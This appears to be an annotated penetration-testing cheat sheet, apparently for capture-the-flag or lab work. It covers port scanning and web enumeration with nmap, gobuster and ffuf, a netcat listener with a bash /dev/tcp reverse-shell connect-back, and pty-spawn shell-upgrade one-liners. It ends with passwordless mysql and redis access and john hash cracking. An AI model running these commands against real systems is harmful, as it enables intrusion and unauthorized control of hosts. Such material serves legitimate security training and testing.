Contains handy commands and code snippets for use...
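# Recon / web enumeration. $IP and $DOMAIN are expected to be set in the
# shell beforehand (e.g. export IP=...). Placeholders in <angle brackets> and
# {braces} are filled in by hand.
# nmap: -sS needs raw sockets (hence sudo); -sV and -sC add version probes and
# default NSE scripts, which are far noisier than a bare SYN scan.
# Add -p- for all 65535 ports
# -oA writes three files under nmap/, so that directory must exist first or
# nmap aborts with "Failed to open ... for writing".
mkdir -p nmap
sudo nmap -sS -sV -sC -oA "nmap/<filename>" "$IP"
# Directory brute force; {wordlist} is the wordlist path.
gobuster dir -u "http://$IP/" -o gobust.out -w {wordlist}
# Virtual-host enumeration against the known domain.
gobuster vhost -w ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://$DOMAIN"
# Host-header fuzzing. The -H value MUST be double-quoted: inside single quotes
# $DOMAIN is not expanded and the literal header "Host: FUZZ.$DOMAIN" is sent,
# so nothing matches. -ms is ffuf's response-size matcher.
./ffuf -w ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://$IP/" -H "Host: FUZZ.$DOMAIN" -ms 0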
CTRL + U
- See revshells in tools.md
# Shell upgrade: turn a plain reverse shell into a full interactive tty.
# in separate terminals
# Listener on the host side (port 9999 must match <host port> below).
nc -nvlp 9999
# Connect-back run on the target; <host ip>/<host port> are placeholders for
# the listener above. An unexpected outbound connection from a server process
# is exactly what egress filtering and outbound-connection alerting exist to catch.
bash -c "bash -i >& /dev/tcp/<host ip>/<host port> 0>&1"
# examples below to run on target (pick one, whichever interpreter exists there).
# The python variants spawn bash inside a pty; the ruby/perl variants only exec bash.
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash'"
# now ctrl+z it (this backgrounds the nc session on the host side)
# back on host machine run
# raw mode with local echo off, then foreground nc so the remote pty handles
# line editing and control characters
stty raw -echo && fg
# enter, enter, now you're back in the shell, last step below to be able to ctrl+c, clear etc.
# TERM is needed by programs that consult terminfo (clear, less, editors).
export TERM=xterm
# Service access. $IP as above. NOTE: $USER is the *local* login name unless it
# has been reassigned, so set or replace it with the target account first.
# No -p is given, so mysql attempts a passwordless login rather than prompting.
mysql -h $IP -u $USER
# redis-cli connects without credentials unless -a / --askpass is supplied; if
# the instance requires AUTH, commands below return NOAUTH instead of data.
redis-cli -h $IP
# the next two lines are typed at the redis-cli prompt, not in the shell
info keyspace
get <key>
# john single-crack mode; input file is one user:hash per line
./john --single <hash file in format user:hash>.txt